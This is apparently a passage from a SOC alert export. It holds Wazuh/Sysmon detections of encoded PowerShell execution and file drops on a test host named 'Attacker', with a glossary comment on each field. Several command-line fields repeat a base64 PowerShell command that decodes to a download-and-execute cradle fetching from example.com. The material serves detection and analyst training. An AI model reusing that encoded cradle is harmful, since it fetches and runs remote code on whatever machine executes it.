No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.currentDirectory:  C:\\Users\\Attcker1\\
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {94294ddc-ea85-67fe-8465-020000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonId:  0x26584
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.terminalSessionId:  1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.integrityLevel:  Medium
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.hashes:  SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessGuid:  {94294ddc-bc59-680a-4f0a-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessId:  11636
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentImage:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentCommandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentUser:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Powershell.exe spawned a powershell process which executed a base64 encoded command

🧠 What happened? Powershell.exe spawned a powershell process which executed a base64 encoded command

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:36:46.692+0000 | 🧠 MITRE: ['Execution'] – ['PowerShell'] [T1059.001]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1059 – Command & Scripting Interpreter

🔍 Full Alert Details
timestamp:  2025-04-24T22:36:46.692+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  12
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Powershell.exe spawned a powershell process which executed a base64 encoded command
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92057
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1059.001']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Execution']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['PowerShell']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  7
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534206.815875
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  1
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  1
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:34:10.9720728Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  280968
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:34:09.726 ProcessGuid: {94294ddc-bc61-680a-550a-000000000e00} ProcessId: 3924 Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe FileVersion: 10.0.26100.3323 (WinBuild.160101.0800) Description: Windows PowerShell Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: PowerShell.EXE CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA CurrentDirectory: C:\Users\Attcker1\ User: Attacker\Attcker1 LogonGuid: {94294ddc-ea85-67fe-8465-020000000000} LogonId: 0x26584 TerminalSessionId: 1 IntegrityLevel: Medium Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC ParentProcessGuid: {94294ddc-bc5d-680a-530a-000000000e00} ParentProcessId: 2372 ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA ParentUser: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:34:09.726
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bc61-680a-550a-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  3924
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.fileVersion:  10.0.26100.3323 (WinBuild.160101.0800)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.description:  Windows PowerShell
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.product:  Microsoft® Windows® Operating System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.company:  Microsoft Corporation
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.originalFileName:  PowerShell.EXE
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.commandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.currentDirectory:  C:\\Users\\Attcker1\\
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {94294ddc-ea85-67fe-8465-020000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonId:  0x26584
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.terminalSessionId:  1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.integrityLevel:  Medium
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.hashes:  SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessGuid:  {94294ddc-bc5d-680a-530a-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessId:  2372
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentImage:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentCommandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentUser:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Executable file dropped in folder commonly used by malware

🧠 What happened? Executable file dropped in folder commonly used by malware

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:36:46.702+0000 | 🧠 MITRE: ['Command and Control'] – ['Ingress Tool Transfer'] [T1105]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1105 – Ingress Tool Transfer

🔍 Full Alert Details
timestamp:  2025-04-24T22:36:46.702+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  15
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable file dropped in folder commonly used by malware
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92213
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1105']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Command and Control']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Ingress Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  10
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534206.823937
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  11
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  11
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:34:11.1938944Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  280969
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-24 22:34:11.163 ProcessGuid: {94294ddc-bc61-680a-550a-000000000e00} ProcessId: 3924 Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_dobv25yk.2l4.ps1 CreationUtcTime: 2025-04-24 22:34:11.163 User: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:34:11.163
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bc61-680a-550a-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  3924
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetFilename:  C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_dobv25yk.2l4.ps1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.creationUtcTime:  2025-04-24 22:34:11.163
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Powershell.exe spawned a powershell process which executed a base64 encoded command

🧠 What happened? Powershell.exe spawned a powershell process which executed a base64 encoded command

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:36:46.889+0000 | 🧠 MITRE: ['Execution'] – ['PowerShell'] [T1059.001]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1059 – Command & Scripting Interpreter

🔍 Full Alert Details
timestamp:  2025-04-24T22:36:46.889+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  12
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Powershell.exe spawned a powershell process which executed a base64 encoded command
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92057
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1059.001']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Execution']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['PowerShell']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  8
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534206.826701
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  1
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  1
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:34:19.4863479Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  281055
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:34:18.124 ProcessGuid: {94294ddc-bc6a-680a-5b0a-000000000e00} ProcessId: 12136 Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe FileVersion: 10.0.26100.3323 (WinBuild.160101.0800) Description: Windows PowerShell Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: PowerShell.EXE CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA CurrentDirectory: C:\Users\Attcker1\ User: Attacker\Attcker1 LogonGuid: {94294ddc-ea85-67fe-8465-020000000000} LogonId: 0x26584 TerminalSessionId: 1 IntegrityLevel: Medium Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC ParentProcessGuid: {94294ddc-bc66-680a-590a-000000000e00} ParentProcessId: 11716 ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA ParentUser: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:34:18.124
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bc6a-680a-5b0a-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  12136
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.fileVersion:  10.0.26100.3323 (WinBuild.160101.0800)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.description:  Windows PowerShell
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.product:  Microsoft® Windows® Operating System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.company:  Microsoft Corporation
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.originalFileName:  PowerShell.EXE
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.commandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.currentDirectory:  C:\\Users\\Attcker1\\
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {94294ddc-ea85-67fe-8465-020000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonId:  0x26584
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.terminalSessionId:  1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.integrityLevel:  Medium
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.hashes:  SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessGuid:  {94294ddc-bc66-680a-590a-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessId:  11716
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentImage:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentCommandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentUser:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Executable file dropped in folder commonly used by malware

🧠 What happened? Executable file dropped in folder commonly used by malware

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:36:46.898+0000 | 🧠 MITRE: ['Command and Control'] – ['Ingress Tool Transfer'] [T1105]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1105 – Ingress Tool Transfer

🔍 Full Alert Details
timestamp:  2025-04-24T22:36:46.898+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  15
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable file dropped in folder commonly used by malware
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92213
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1105']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Command and Control']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Ingress Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  11
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534206.834771
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  11
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  11
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:34:19.6850661Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  281056
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

